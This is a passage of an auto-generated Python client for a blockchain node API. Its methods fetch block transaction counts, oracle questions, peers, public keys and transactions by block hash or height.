>>> thread = api.get_genesis_block_txs_count(async=True)
>>> result = thread.get()
:param async bool
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_genesis_block_txs_count_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_genesis_block_txs_count_with_http_info(**kwargs) # noqa: E501
return data
def get_genesis_block_txs_count_with_http_info(self, **kwargs): # noqa: E501
"""get_genesis_block_txs_count # noqa: E501
Get the genesis block transactions count # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_genesis_block_txs_count_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tx_types', 'exclude_tx_types'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_genesis_block_txs_count" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'tx_types' in params:
query_params.append(('tx_types', params['tx_types'])) # noqa: E501
if 'exclude_tx_types' in params:
query_params.append(('exclude_tx_types', params['exclude_tx_types'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/txs/count/genesis', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_latest_block_txs_count(self, **kwargs): # noqa: E501
"""get_latest_block_txs_count # noqa: E501
Get the latest block transactions count # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_latest_block_txs_count(async=True)
>>> result = thread.get()
:param async bool
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_latest_block_txs_count_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_latest_block_txs_count_with_http_info(**kwargs) # noqa: E501
return data
def get_latest_block_txs_count_with_http_info(self, **kwargs): # noqa: E501
"""get_latest_block_txs_count # noqa: E501
Get the latest block transactions count # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_latest_block_txs_count_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tx_types', 'exclude_tx_types'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_latest_block_txs_count" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'tx_types' in params:
query_params.append(('tx_types', params['tx_types'])) # noqa: E501
if 'exclude_tx_types' in params:
query_params.append(('exclude_tx_types', params['exclude_tx_types'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/txs/count/latest', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_oracle_questions(self, oracle_pub_key, **kwargs): # noqa: E501
"""get_oracle_questions # noqa: E501
Get active oracle questions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_oracle_questions(oracle_pub_key, async=True)
>>> result = thread.get()
:param async bool
:param str oracle_pub_key: Oracle public key (required)
:param str _from: Last query id in previous page
:param int max: Max number of oracle queries received
:return: OracleQuestions
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_oracle_questions_with_http_info(oracle_pub_key, **kwargs) # noqa: E501
else:
(data) = self.get_oracle_questions_with_http_info(oracle_pub_key, **kwargs) # noqa: E501
return data
def get_oracle_questions_with_http_info(self, oracle_pub_key, **kwargs): # noqa: E501
"""get_oracle_questions # noqa: E501
Get active oracle questions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_oracle_questions_with_http_info(oracle_pub_key, async=True)
>>> result = thread.get()
:param async bool
:param str oracle_pub_key: Oracle public key (required)
:param str _from: Last query id in previous page
:param int max: Max number of oracle queries received
:return: OracleQuestions
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['oracle_pub_key', '_from', 'max'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_oracle_questions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'oracle_pub_key' is set
if ('oracle_pub_key' not in params or
params['oracle_pub_key'] is None):
raise ValueError("Missing the required parameter `oracle_pub_key` when calling `get_oracle_questions`") # noqa: E501
if 'max' in params and params['max'] > 1000: # noqa: E501
raise ValueError("Invalid value for parameter `max` when calling `get_oracle_questions`, must be a value less than or equal to `1000`") # noqa: E501
if 'max' in params and params['max'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `max` when calling `get_oracle_questions`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'oracle_pub_key' in params:
query_params.append(('oracle_pub_key', params['oracle_pub_key'])) # noqa: E501
if '_from' in params:
query_params.append(('from', params['_from'])) # noqa: E501
if 'max' in params:
query_params.append(('max', params['max'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/oracle-questions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OracleQuestions', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_peers(self, **kwargs): # noqa: E501
"""get_peers # noqa: E501
Get node Peers # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_peers(async=True)
>>> result = thread.get()
:param async bool
:return: Peers
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_peers_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_peers_with_http_info(**kwargs) # noqa: E501
return data
def get_peers_with_http_info(self, **kwargs): # noqa: E501
"""get_peers # noqa: E501
Get node Peers # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_peers_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: Peers
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_peers" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/debug/peers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Peers', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_pending_block_txs_count(self, **kwargs): # noqa: E501
"""get_pending_block_txs_count # noqa: E501
Get the pending block transactions count # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_pending_block_txs_count(async=True)
>>> result = thread.get()
:param async bool
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_pending_block_txs_count_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_pending_block_txs_count_with_http_info(**kwargs) # noqa: E501
return data
def get_pending_block_txs_count_with_http_info(self, **kwargs): # noqa: E501
"""get_pending_block_txs_count # noqa: E501
Get the pending block transactions count # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_pending_block_txs_count_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tx_types', 'exclude_tx_types'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_pending_block_txs_count" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'tx_types' in params:
query_params.append(('tx_types', params['tx_types'])) # noqa: E501
if 'exclude_tx_types' in params:
query_params.append(('exclude_tx_types', params['exclude_tx_types'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/txs/count/pending', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_pub_key(self, **kwargs): # noqa: E501
"""get_pub_key # noqa: E501
Get user's public key address # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_pub_key(async=True)
>>> result = thread.get()
:param async bool
:return: PubKey
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_pub_key_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_pub_key_with_http_info(**kwargs) # noqa: E501
return data
def get_pub_key_with_http_info(self, **kwargs): # noqa: E501
"""get_pub_key # noqa: E501
Get user's public key address # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_pub_key_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:return: PubKey
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_pub_key" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/account/pub-key', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PubKey', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_transaction_from_block_hash(self, hash, tx_index, **kwargs): # noqa: E501
"""get_transaction_from_block_hash # noqa: E501
Get a transaction by index in the block by hash # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_transaction_from_block_hash(hash, tx_index, async=True)
>>> result = thread.get()
:param async bool
:param str hash: Hash of the block to search for (required)
:param int tx_index: Index of the transaction in the block (required)
:param str tx_encoding: Transactions encoding
:return: SingleTxObject
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_transaction_from_block_hash_with_http_info(hash, tx_index, **kwargs) # noqa: E501
else:
(data) = self.get_transaction_from_block_hash_with_http_info(hash, tx_index, **kwargs) # noqa: E501
return data
def get_transaction_from_block_hash_with_http_info(self, hash, tx_index, **kwargs): # noqa: E501
"""get_transaction_from_block_hash # noqa: E501
Get a transaction by index in the block by hash # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_transaction_from_block_hash_with_http_info(hash, tx_index, async=True)
>>> result = thread.get()
:param async bool
:param str hash: Hash of the block to search for (required)
:param int tx_index: Index of the transaction in the block (required)
:param str tx_encoding: Transactions encoding
:return: SingleTxObject
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['hash', 'tx_index', 'tx_encoding'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_transaction_from_block_hash" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'hash' is set
if ('hash' not in params or
params['hash'] is None):
raise ValueError("Missing the required parameter `hash` when calling `get_transaction_from_block_hash`") # noqa: E501
# verify the required parameter 'tx_index' is set
if ('tx_index' not in params or
params['tx_index'] is None):
raise ValueError("Missing the required parameter `tx_index` when calling `get_transaction_from_block_hash`") # noqa: E501
collection_formats = {}
path_params = {}
if 'hash' in params:
path_params['hash'] = params['hash'] # noqa: E501
if 'tx_index' in params:
path_params['tx_index'] = params['tx_index'] # noqa: E501
query_params = []
if 'tx_encoding' in params:
query_params.append(('tx_encoding', params['tx_encoding'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/tx/hash/{hash}/{tx_index}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SingleTxObject', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_transaction_from_block_height(self, height, tx_index, **kwargs): # noqa: E501
"""get_transaction_from_block_height # noqa: E501
Get a transaction by index in the block by height # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_transaction_from_block_height(height, tx_index, async=True)
>>> result = thread.get()
:param async bool
:param int height: Height of the block to search for (required)
:param int tx_index: Index of the transaction in the block (required)
:param str tx_encoding: Transactions encoding
:return: SingleTxObject
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_transaction_from_block_height_with_http_info(height, tx_index, **kwargs) # noqa: E501
else:
(data) = self.get_transaction_from_block_height_with_http_info(height, tx_index, **kwargs) # noqa: E501
return data
def get_transaction_from_block_height_with_http_info(self, height, tx_index, **kwargs): # noqa: E501
"""get_transaction_from_block_height # noqa: E501
Get a transaction by index in the block by height # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_transaction_from_block_height_with_http_info(height, tx_index, async=True)
>>> result = thread.get()
:param async bool
:param int height: Height of the block to search for (required)
:param int tx_index: Index of the transaction in the block (required)
:param str tx_encoding: Transactions encoding
:return: SingleTxObject
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['height', 'tx_index', 'tx_encoding'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_transaction_from_block_height" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'height' is set
if ('height' not in params or
params['height'] is None):
raise ValueError("Missing the required parameter `height` when calling `get_transaction_from_block_height`") # noqa: E501
# verify the required parameter 'tx_index' is set
if ('tx_index' not in params or
params['tx_index'] is None):
raise ValueError("Missing the required parameter `tx_index` when calling `get_transaction_from_block_height`") # noqa: E501
collection_formats = {}
path_params = {}
if 'height' in params:
path_params['height'] = params['height'] # noqa: E501
if 'tx_index' in params:
path_params['tx_index'] = params['tx_index'] # noqa: E501
query_params = []
if 'tx_encoding' in params:
query_params.append(('tx_encoding', params['tx_encoding'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/tx/height/{height}/{tx_index}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SingleTxObject', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_transaction_from_block_latest(self, tx_index, **kwargs): # noqa: E501
"""get_transaction_from_block_latest # noqa: E501
Get a transaction by index in the latest block # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_transaction_from_block_latest(tx_index, async=True)
>>> result = thread.get()
:param async bool
:param int tx_index: Index of the transaction in the block (required)
:param str tx_encoding: Transactions encoding
:return: SingleTxObject
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_transaction_from_block_latest_with_http_info(tx_index, **kwargs) # noqa: E501
else:
(data) = self.get_transaction_from_block_latest_with_http_info(tx_index, **kwargs) # noqa: E501
return data
def get_transaction_from_block_latest_with_http_info(self, tx_index, **kwargs): # noqa: E501
"""get_transaction_from_block_latest # noqa: E501
Get a transaction by index in the latest block # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_transaction_from_block_latest_with_http_info(tx_index, async=True)
>>> result = thread.get()
:param async bool
:param int tx_index: Index of the transaction in the block (required)
:param str tx_encoding: Transactions encoding
:return: SingleTxObject
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tx_index', 'tx_encoding'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_transaction_from_block_latest" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'tx_index' is set
if ('tx_index' not in params or
params['tx_index'] is None):
raise ValueError("Missing the required parameter `tx_index` when calling `get_transaction_from_block_latest`") # noqa: E501
collection_formats = {}
path_params = {}
if 'tx_index' in params:
path_params['tx_index'] = params['tx_index'] # noqa: E501
query_params = []
if 'tx_encoding' in params:
query_params.append(('tx_encoding', params['tx_encoding'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/tx/latest/{tx_index}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SingleTxObject', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_txs_list_from_block_range_by_hash(self, _from, to, **kwargs): # noqa: E501
"""get_txs_list_from_block_range_by_hash # noqa: E501
Get transactions list from a block range by hash # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_txs_list_from_block_range_by_hash(_from, to, async=True)
>>> result = thread.get()
:param async bool
:param str _from: Hash of the block to start the range (required)
:param str to: Hash of the block to end the range (required)
:param str tx_encoding: Transactions encoding
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: TxObjects
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_txs_list_from_block_range_by_hash_with_http_info(_from, to, **kwargs) # noqa: E501
else:
(data) = self.get_txs_list_from_block_range_by_hash_with_http_info(_from, to, **kwargs) # noqa: E501
return data
def get_txs_list_from_block_range_by_hash_with_http_info(self, _from, to, **kwargs): # noqa: E501
"""get_txs_list_from_block_range_by_hash # noqa: E501
Get transactions list from a block range by hash # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_txs_list_from_block_range_by_hash_with_http_info(_from, to, async=True)
>>> result = thread.get()
:param async bool
:param str _from: Hash of the block to start the range (required)
:param str to: Hash of the block to end the range (required)
:param str tx_encoding: Transactions encoding
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: TxObjects
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['_from', 'to', 'tx_encoding', 'tx_types', 'exclude_tx_types'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_txs_list_from_block_range_by_hash" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter '_from' is set
if ('_from' not in params or
params['_from'] is None):
raise ValueError("Missing the required parameter `_from` when calling `get_txs_list_from_block_range_by_hash`") # noqa: E501
# verify the required parameter 'to' is set
if ('to' not in params or
params['to'] is None):
raise ValueError("Missing the required parameter `to` when calling `get_txs_list_from_block_range_by_hash`") # noqa: E501
if '_from' in params and params['_from'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `_from` when calling `get_txs_list_from_block_range_by_hash`, must be a value greater than or equal to `0`") # noqa: E501
if 'to' in params and params['to'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `to` when calling `get_txs_list_from_block_range_by_hash`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if '_from' in params:
query_params.append(('from', params['_from'])) # noqa: E501
if 'to' in params:
query_params.append(('to', params['to'])) # noqa: E501
if 'tx_encoding' in params:
query_params.append(('tx_encoding', params['tx_encoding'])) # noqa: E501
if 'tx_types' in params:
query_params.append(('tx_types', params['tx_types'])) # noqa: E501
if 'exclude_tx_types' in params:
query_params.append(('exclude_tx_types', params['exclude_tx_types'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/txs/list/hash', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TxObjects', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_txs_list_from_block_range_by_height(self, _from, to, **kwargs): # noqa: E501
"""get_txs_list_from_block_range_by_height # noqa: E501
Get transactions list from a block range by height # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_txs_list_from_block_range_by_height(_from, to, async=True)
>>> result = thread.get()
:param async bool
:param int _from: Height of the block to start the range (required)
:param int to: Height of the block to end the range (required)
:param str tx_encoding: Transactions encoding
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: TxObjects
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_txs_list_from_block_range_by_height_with_http_info(_from, to, **kwargs) # noqa: E501
else:
(data) = self.get_txs_list_from_block_range_by_height_with_http_info(_from, to, **kwargs) # noqa: E501
return data
def get_txs_list_from_block_range_by_height_with_http_info(self, _from, to, **kwargs): # noqa: E501
"""get_txs_list_from_block_range_by_height # noqa: E501
Get transactions list from a block range by height # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_txs_list_from_block_range_by_height_with_http_info(_from, to, async=True)
>>> result = thread.get()
:param async bool
:param int _from: Height of the block to start the range (required)
:param int to: Height of the block to end the range (required)
:param str tx_encoding: Transactions encoding
:param str tx_types: Transactions types to show. Comma separated
:param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
:return: TxObjects
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['_from', 'to', 'tx_encoding', 'tx_types', 'exclude_tx_types'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_txs_list_from_block_range_by_height" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter '_from' is set
if ('_from' not in params or
params['_from'] is None):
raise ValueError("Missing the required parameter `_from` when calling `get_txs_list_from_block_range_by_height`") # noqa: E501
# verify the required parameter 'to' is set
if ('to' not in params or
params['to'] is None):
raise ValueError("Missing the required parameter `to` when calling `get_txs_list_from_block_range_by_height`") # noqa: E501
if '_from' in params and params['_from'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `_from` when calling `get_txs_list_from_block_range_by_height`, must be a value greater than or equal to `0`") # noqa: E501
if 'to' in params and params['to'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `to` when calling `get_txs_list_from_block_range_by_height`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if '_from' in params:
query_params.append(('from', params['_from'])) # noqa: E501
if 'to' in params:
query_params.append(('to', params['to'])) # noqa: E501
if 'tx_encoding' in params:
query_params.append(('tx_encoding', params['tx_encoding'])) # noqa: E501
if 'tx_types' in params:
query_params.append(('tx_types', params['tx_types'])) # noqa: E501
if 'exclude_tx_types' in params:
query_params.append(('exclude_tx_types', params['exclude_tx_types'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/block/txs/list/height', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TxObjects', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def post_name_claim_tx(self, body, **kwargs): # noqa: E501
"""post_name_claim_tx # noqa: E501
Create name claim transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
